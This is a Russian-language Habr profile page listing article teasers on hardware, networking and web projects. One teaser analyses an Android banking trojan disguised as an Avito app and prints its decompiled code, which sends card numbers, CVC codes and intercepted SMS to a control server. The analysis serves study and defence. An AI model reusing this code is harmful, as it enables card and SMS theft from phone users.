Search
Write a publication
Pull to refresh
0
Сергей @sav6622read⁠-⁠only

Пользователь

Send message

Поднимаем SOC: ARM + FPGA

Reading time14 min
Views109K


На днях ко мне в руки попала EBV SoCrates Evaluation Board. В двух словах — это плата с SoC от фирмы Altera, на борту которой есть двухъядерный ARM и FPGA Cyclone V.

ARM и FPGA на одном чипе — это должно быть очень интересно! Но для начала всё это добро нужно «поднять».
Об этом процессе я и поведаю в данной статье.

Если вам в руки попала такая или подобная плата и вы не до конца уверены, что же с ней нужно делать. Если вы всегда думали, что FPGA — это что-то сложное и непонятно, как к этому подступиться. Или вы просто любопытный инженер. Тогда заходите. Мы всем рады.

А в качестве маленького бонуса измерим пропускную способность между CPU и FPGA.
Добро пожаловать

Вместе веселей: python + flask + google app engine

Reading time6 min
Views29K
Предыстория: я, как и многие на Хабрахабре, чертовски люблю слушать музыку. Чаще всего делаю это в ВКонтакте. Иногда уже сфомированный плейлист надоедает — хочется чего-нибудь нового; но так, чтобы не сильно отличалось от того, что уже есть. Для этого на всех сервисах, предоставляющих возможность прослушивания музыки, существуют рекомендации. Признаюсь честно, рекомендации в ВКонтакте меня ужасают. Может кому-то нравится, но у меня тамошний подбор вызывает желание закрыть браузер (ИМХО, конечно). В общем, решил я эту ситуацию для себя исправить и реализовать свои собственные рекомендации с использованием API ВКонтакте и Last.fm. Так как я много слышал и читал про Google App Engine, но никогда его не использовал, решено было приобщиться к этой платформе.

Сразу скажу, что тонкости взаимодействия с API или алгоритм подбора рекомендаций здесь я описывать не буду. Об этом — в следующих статьях, может быть. В данной статье описан только процесс создания, настройки и деплоя приложения на платформе Google App Engine с использованием python и flask.
Об опечатках и неточностях просьба сообщать в личку. Спасибо.
Читать дальше →

Распознавание русской речи для колл-центров и параноиков

Reading time11 min
Views74K
Когда вы звоните в колл-центр, вас внимательно слушает, а иногда и отвечает, не только оператор и товарищ майор, но и робот-аналитик. Этот хитрый робот умеет распознавать нужные ключевые слова в вашей речи, но и производить полнотекстовое распознавание речи, и на основании этого всего, делать далеко идущие выводы.



Анализировать записи можно как «на лету» (что делается редко), так и постфактум, например, разыскивая конкретные звонки для анализа живым человеком. Я работал с несколькими программно-аппаратными решениями для этого, и сейчас поделюсь опытом.


Автоматическое распознавание уже начинает справляться с русским языком, за исключением некоторых особо сложных случаев

Сразу отмечу — да, эти решения могут сочетаться с определением конкретного человека по «голосовому отпечатку пальца», но это немного другая история и подробно останавливаться на этом здесь я не буду.
Читать дальше →

Очередная «умная» розетка своими руками. Часть 1

Reading time3 min
Views186K
Да, да, да. Еще одна. Понимаю, всем надоело. Но очень уж хотелось сделать самому, свою собственную «умную» розетку, с лото и курсистками. Встраиваемую (в доме — скрытая проводка). С управлением через WiFi (локально) и Интернет (глобально). С получением текущего статуса (в перспективе — с информацией о потреблении). С подключением нескольких розеток в одном блоке (до четырех). С датчиками температуры, освещенности и присутствия. С видеокамерой, в конце концов!

Первая часть — просто проверяем общую работоспособность схемы. По сути — некий аналог WeMo Switch, только встраиваемый в стандартный подрозетник и потому не привязанный к какому-то определенному дизайну (чтобы вписаться в любой уже существующий интерьер).

Итак, чего хочется? Хочется управлять независимо каждой из четырех розеток (у меня дома в одной из комнат розетки объединены в блоки по два двухрозеточных модуля вплотную друг к другу, в двух стандартных пластиковых подрозетниках соответственно). К одному из таких блоков подключены все агрегаты (освещение, насос фильтра, нагреватель, компрессор) аквариума с красивым парчовым сомиком, вот ими и будем управлять. Сомик вот такой, если что (картинка для привлечения внимания):

image
Читать дальше →

Cubietruck. Дорожный мини сервер. Часть 1

Reading time5 min
Views39K
image
Идея такого сервера родилась на отдыхе. Вечером хотелось посмотреть онлайн сериальчик на планшете, а из-за не устойчивого приема 3G, просмотр превращался в муку. Как вариант можно было скачать серию, но опять же при скачивании сигнал постоянно плавал, скорость прыгала и планшет надо было держать постоянно включенным и на зарядке (специфика приложения). К вечеру скачивалось пару серий и можно было спокойно посмотреть сериальчик.
В это время то и зародилось идея создания данного девайса. В инете большое количество реализации хранилища информации на одноплатных компьютерах разных производителей, но объединения нескольких решений найдено не было.
Читать дальше →

Автоматизируем социальную активность вашего интернет стартапа с помощью ifttt.com

Reading time5 min
Views5.3K

Начнём с описания ifttt.com



ifttt.com — это очень перспективный стартап, который в двух словах: Lets You Hack Together Web Apps, Without Coding Skills. Если детальнее, то это сервис позволяющий пользователям, без погружения в API огромного количества сервисов и каких либо знаний о разработке\языках программирования смешивать и автоматизировать различную активность друг с другом. В начале 2012 года получили посевные инвестиции в размере $1.5M.

В системе всего несколько сущностей, таких как задачи ( это правила ваших триггеров или реакций на внешнее событие), рецепты (это задачи, которые создали другие и поделились со всеми) и каналы ( это то, что с чем можно пытаться смешивать налаживая разные схемы выполнения задач, каждый канал следует привязать к ifttt.com ).

ifttt main screen
Экран задач выглядит так

Читать дальше →

oDesk (Upwork). Мой опыт за полтора года

Reading time12 min
Views445K
Вот уже полтора года я зарабатываю фрилансом на бирже oDesk. За это время у меня накопилось много материалов по данной теме. В данном топике я собрал все в одну статью и адаптировал для аудитории хабра.
image
Читать дальше →

Прошивка и программирование ATtiny13 при помощи Arduino UPD 17.03.2016

Reading time3 min
Views319K


Всем привет. Уже давно появился способ программировать маленькие, дешёвые, экономичные к питанию и доступные микроконтроллеры ATtiny13A.

Вот собственно всё то что ниже, только в видео формате:



Сегодня расскажу, как я зашиваю Arduino'вские скетчи в ATtiny13A.
Читать дальше →

Как я позорно деактивировал ботнет

Reading time10 min
Views191K
image

Разместил я, ничего не подозревая, объявление на avito.ru. Сколько раз туда ходил! Но на этот раз как-то не удалось…
Я давно был уверен, что многие нехорошие люди парсят телефонные номера с этого сайта, так что такси, строительные материалы, скорая компьютерная помощь, «8-800-555-3-555 — проще позвонить, чем у кого-то занимать» и приглашения на битву экстрасенсов для меня уже привычное дело, но на этот раз было нечто новое.

Приходит мне СМС-сообщение с текстом: «Зaинтерсoвaлo вaше oбьявление кaк нaсчет oбменa нa http://…». Прямо вот так, с пропущенным знаком препинания и ошибками. А по ссылке качается avito.apk. Интересно.

Исследование APK


Ну, подумал я, надо бы глянуть, что этот APK делает. Результат привычной для меня связки из apktool + dex2jar + jd-gui меня не удовлетворил, т.к. не было видно часть классов деревом, хотя доступ по ссылкам к ним получить было можно. Решил я воспользоваться новомодными онлайн-sandbox'ами — и декомпилированный код получил, и информацию, и pcap-файл со сдампленным трафиком. Как оказалось, этот файл загружали до меня, поэтому в мои руки попал более ранний анализ, что было достаточно полезно.

Итак, что умеет этот троян:
  • delivery&&& — рассылка СМС-сообщений на номера из телефонной книги с заданным текстом
  • sent&&& — отправка заданных СМС-сообщений с сервера
  • rent&&& — перехват всех СМС-сообщений и отправка их на сервер
  • sms_stop&&& — отмена перехвата СМС-сообщений
  • ussd&&& — USSD-запрос
  • call_1&&& — установка и отмена безусловной переадресации

Немного кода из моих заметок
protected HttpRequestBase a()
    {
        try
        {
            HttpPost httppost = new HttpPost(d());
            ArrayList arraylist = new ArrayList();
            arraylist.add(new BasicNameValuePair("bot_id", com.avito.a.c.a(c())));
            arraylist.add(new BasicNameValuePair("number", b));
            arraylist.add(new BasicNameValuePair("month", Integer.toString(c.intValue())));
            arraylist.add(new BasicNameValuePair("year", Integer.toString(d.intValue())));
            arraylist.add(new BasicNameValuePair("cvc", Integer.toString(e.intValue())));
            httppost.setEntity(new UrlEncodedFormEntity(arraylist, "UTF-8"));
            return httppost;
        }
        catch(UnsupportedEncodingException unsupportedencodingexception)
        {
            unsupportedencodingexception.printStackTrace();
        }
        return null;
    }

    protected String d()
    {
        return new String((new StringBuilder()).append(a).append("set_card.php").toString());
    }






    protected HttpRequestBase a()
    {
        try
        {
            HttpPost httppost = new HttpPost(d());
            ArrayList arraylist = new ArrayList();
            arraylist.add(new BasicNameValuePair("id", com.avito.a.c.a(b)));
            arraylist.add(new BasicNameValuePair("info", com.avito.a.c.b(b)));
            httppost.setEntity(new UrlEncodedFormEntity(arraylist, "UTF-8"));
            return httppost;
        }
        catch(UnsupportedEncodingException unsupportedencodingexception)
        {
            unsupportedencodingexception.printStackTrace();
        }
        return null;
    }

    protected String d()
    {
        return new String((new StringBuilder()).append(a).append("get.php").toString());
    }




    protected HttpRequestBase a()
    {
        try
        {
            JSONObject jsonobject = new JSONObject();
            jsonobject.put("text", c);
            jsonobject.put("number", d);
            jsonobject.put("date", e);
            HttpPost httppost = new HttpPost(d());
            ArrayList arraylist = new ArrayList();
            arraylist.add(new BasicNameValuePair("bot_id", com.avito.a.c.a(b)));
            arraylist.add(new BasicNameValuePair("sms", jsonobject.toString()));
            httppost.setEntity(new UrlEncodedFormEntity(arraylist, "UTF-8"));
            return httppost;
        }
        catch(UnsupportedEncodingException unsupportedencodingexception)
        {
            unsupportedencodingexception.printStackTrace();
        }
        catch(JSONException jsonexception)
        {
            jsonexception.printStackTrace();
        }
        return null;
    }

    protected String d()
    {
        return new String((new StringBuilder()).append(a).append("load_sms.php").toString());


Помимо этих команд, троян отключает Wifi Sleep, пытается получить доступ к зашифрованному хранилищу и установить себя в качестве Android-администратора (естественно, при этом используются стандартные диалоги ОС, где можно отменить данное действие). Код трояна не обфусцирован, некоторые строки закодированы base64. Вообще непонятно, что это за троян такой. То ли его собирали копипастой, то ли он основан на каком-то другом трояне, то ли еще что, но в нем имеются строки на португальском, немецком, английском, Ubuntu-шрифты, форма для перехвата данных из приложения немецкого банка Commerzbank, значок какой-то игры и флеш-плеера.
Читать дальше →

Обзор отечественного одноплатного компьютера MB 77.07: От распаковки и прошивки, до написания первой DSP программы

Reading time30 min
Views61K
В наше время рынок SBC (Single Board Computer) сильно разросся, и появилось огромное количество одноплатных компьютеров на самых различных процессорах, от старых и всем известных, до совсем новых и специализированных. Недавно ко мне попал Module MB 77.07 – одноплатный компьютер от НТЦ «Модуль» на процессоре отечественного производства К1879ХБ1Я, про который на хабре уже однажды оставили небольшую заметку люди из компании Promwad. С момента того поста плату стали продавать всем желающим и было выложено ПО на официальный github компании – http://github.com/RC-MODULE

В статье будет дано описание железа и софта, от распаковки и прошивки, до написания простого примера – аудио-эффекта эха на встроенном в используемый процессор DSP ядре NeuroMatrix.
Читать дальше →

Интерфейсы в реальном мире

Reading time5 min
Views180K
IT-интерфейсы часто растут из физических. Например, вот аппаратные чекбоксы:



Вообще, лучший же пример правильного инженерного интерфейса – это гранёный стакан.

Почему? Очень просто. С одной стороны, он дружелюбен к советским роботам: круглая верхняя полоса позволяет автоматической мойке нащупать его ещё с 40-х годов. С другой стороны, он прощает человеческие ошибки: ребра останавливают скатывание стакана со стола при падении. Плюс он просто красивый.

Сейчас покажу ещё несколько интерфейсов, которые облегчают жизнь. Общий смысл – попробовать понять, как думал разработчик, чтобы сделать что-то удобнее.
Читать дальше →

Взгляд на 10G Ethernet со стороны FPGA разработчика

Reading time8 min
Views103K
Всем привет!

Многие специалисты знают, что топовое сетевое оборудование использует специальные чипы для обработки трафика. Я принимаю участие в разработке таких молотилок и хочу поделиться своим опытом в создании таких высокопроизводительных девайсов (со интерфейсами 10/40/100G Ethernet).

Для создания нового канала сетевики чаще всего берут оптику, пару SFP+ модулей, втыкают их в девайсы: лампочки радостно загораются, пакеты начинают приходить: чип начинает их передавать получателям. Но как чип получает пакеты из среды передачи? Если интересно, то добро пожаловать под кат.
Читать дальше →

3D моделирование формы лица по генам человека

Reading time4 min
Views24K


Привет, Хабр! Мы — биотех-стартап «Мой ген». Мы хотим принести в Россию дивный новый мир персональной генетики. В нашем блоге мы планируем размещать последние новости в этой области, представлять интересные научные статьи по биоинформатике, и наверное даже расскажем однажды, каково это — быть биостартапом в нашей стране. Надеемся, что уже скоро в нашу жизнь войдут концепции «облачная лаборатория» и «генетика вещей» (puns intended), и будем этому всячески способствовать своими усилиями.
Читать дальше →

Анализ сетевого трафика на сервере с помощью tshark

Reading time11 min
Views82K
tshark

В практике системного администрирования довольно часто приходится cталкиваться со сложными ситуациями, в которых не помогают ни инструменты сбора статистики (например, netstat), ни стандартные утилиты на основе протокола ICMP (ping, traceroute и другие). В таких случаях часто используются специализированные диагностические утилиты, дающие возможность «слушать» сетевой трафик и анализировать его на уровне единиц передачи отдельных протоколов. Они называются анализаторами трафика, а на профессиональном жаргоне — снифферами. С их помощью можно, во-первых, локализовывать сетевые проблемы и более точно их диагностировать, а во-вторых — обнаруживать паразитный трафик и выявлять в сети зловредное ПО.

Особенно полезными оказываются анализаторы трафика в случаях, когда сетевое ПО плохо документировано или использует собственные закрытые протоколы.
Читать дальше →

Дверной замок. RFID

Reading time5 min
Views161K

Вступление


Доброго времени суток! Параллельно моей предыдущей статье я работал еще над одним «проектом». Собственно у меня завалялось пару китайских RFID читалок. Вот таких:

Фото RC522



До этого, перебирая ящик с инструментами, я нашел новенький, но никому не нужный замок.

Видео работы устройства



На видео есть еще одна Arduino — она нужна только для питания Arduino Pro Mini. В конечной схеме её конечно нет, просто блок питания на 5В я еще не приобрел. Под катом очень много фотографий!
Читать дальше →

Коммунальный рай без забот и хлопот

Reading time7 min
Views45K
Конечно, до коммунального рая нам пока далеко, но позитивные сдвиги все-же намечаются. Сегодня я расскажу о том, как электронными системами управления отоплением в моем многоквартирном доме было сэкономлено 124 тысячи рублей кровных денег жильцов в отопительном сезоне 2013-2014 года. Как только это случилось — все стали довольны, но по началу эта история была практически детективной.
Как это было?

Автоматизация снятия показаний со счетчиков воды

Reading time6 min
Views219K
Все знают, что лень двигатель прогресса. Так случилось и в моем случае.



В квартире присутствует 6 точек раздачи воды (3 холодные и 3 горячие). На каждой из точек стоит счетчик.
Каждые 2 счетчика спрятаны за люками скрытого монтажа, один из люков находится за зеркалом, которое нужно снять, чтобы до него добраться.

Раз в месяц с 20 по 25 число необходимо снимать показания со всех счетчиков и отправлять данные в Управляющую Компанию на бланке определенного образца.

В какой-то момент мне надоело открывать люки, снимать зеркало и было решено автоматизировать снятие показаний.
Читать дальше →

Встраиваем локальные уведомления

Reading time5 min
Views13K
Что самое ужасное в случае удаления приложения? Правильно, потеря связи с аудиторией и невозможность проинформировать о том, что у приложения сменился адрес прописки и имя пакета. Задачу решают Push уведомления, но это довольно хлопотно и не всегда удобно. А иногда и дорого.



Поэтому мы напишем свои, простые как барабан и надежные как танк — локальные push уведомления. Код получился универсальным, и в принципе, его можно использовать как альтернативу обычным «пушам», например для новостной рассылки о том, что вышла новая версия приложения или для клянчанья рейтинга, да для чего угодно.

функционал под катом

Реверс-инжиниринг прошивки китайского Android-планшета

Reading time11 min
Views70K


У китайцев особенное представление о копирайте — у них он просто не действует. В то же время свои наработки они защищают различными техническими средствами, почему-то «забывая» делиться ими со своими клиентами. Казалось бы, ситуация безвыходная: поступила партия китайских планшетов, и встала задача прошить их таким образом, чтобы контент заказчика не стирался при сбросе настроек, при этом имеется стоковая прошивка в неизвестном bin-формате, но отсутствует SDK. Что же делать, как собрать кастомную прошивку? Выход один — применить реверс-инжиниринг.
Подробности

readyto.travel — как сэкономить 30% и более при покупке авиабилетов

Reading time2 min
Views13K
Привет, Хабр!
Хочу рассказать вам о readyto.travel — особенном поисковике авиабилетов, разработанном rtt.
Его отличительная черта — собственный алгоритм поиска маршрутов, который позволяет находить неочевидные дешевые и быстрые варианты перелетов.



За счет чего же это достигается?
Читать дальше →

Information

Rating
Does not participate
Location
Санкт-Петербург, Санкт-Петербург и область, Россия
Date of birth
Registered
Activity